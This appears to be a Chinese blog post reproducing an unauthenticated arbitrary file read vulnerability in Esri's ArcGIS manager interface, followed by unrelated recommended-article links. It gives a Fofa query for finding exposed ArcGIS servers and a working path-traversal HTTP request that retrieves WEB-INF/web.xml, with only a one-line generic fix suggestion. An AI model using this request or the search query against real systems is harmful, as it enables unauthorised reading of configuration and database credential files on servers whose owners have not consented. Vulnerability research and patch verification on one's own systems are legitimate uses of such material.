ArcGIS地理空间平台 manager 任意文件读取漏洞复现

0x01 产品描述:

ArcGIS ‌是一个综合的地理空间平台,由Esri开发,旨在为专业人士和组织提供全面的地理信息系统(GIS)功能。ArcGIS通过集成和连接地理环境中的数据,支持创建、管理、分析、映射和共享各种类型的数据,从而帮助组织在决策制定中占据领先地位‌。
0x02 漏洞描述:

ArcGIS地理空间平台 /arcgis/manager接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
0x03 搜索语句:

Fofa:app="esri-ArcGIS"


0x04 漏洞复现:

复制代码
GET /arcgis/manager/3370/js/../WEB-INF/web.xml HTTP/1.1
Host: your-ip


0x05 修复建议:

在处理客户端输入的参数时,进行严格的验证和过滤,防止未授权的文件访问。

相关推荐
ACRELKY29 分钟前
【黑科技护航安全】分布式光纤测温:让隐患无处可藏
科技·安全
叠叠乐31 分钟前
rust Send Sync 以及对象安全和对象不安全
开发语言·安全·rust
zhu12893035562 小时前
网络安全的现状与防护措施
网络·安全·web安全
澳鹏Appen2 小时前
AI安全:构建负责任且可靠的系统
人工智能·安全
zhu12893035564 小时前
网络安全与防护策略
网络·安全·web安全
DevSecOps选型指南5 小时前
2025年企业级开源治理实践与思考
安全·开源·sca·软件供应链安全厂商
virelin_Y.lin5 小时前
系统与网络安全------Windows系统安全(1)
windows·安全·web安全·系统安全
zhu12893035566 小时前
网络安全基础与防护策略
网络·安全·web安全
EasyGBS7 小时前
NVR接入录像回放平台EasyCVR视频系统守护舌尖上的安全,打造“明厨亮灶”云监管平台
安全·音视频
半句唐诗8 小时前
设计与实现高性能安全TOKEN系统
前端·网络·安全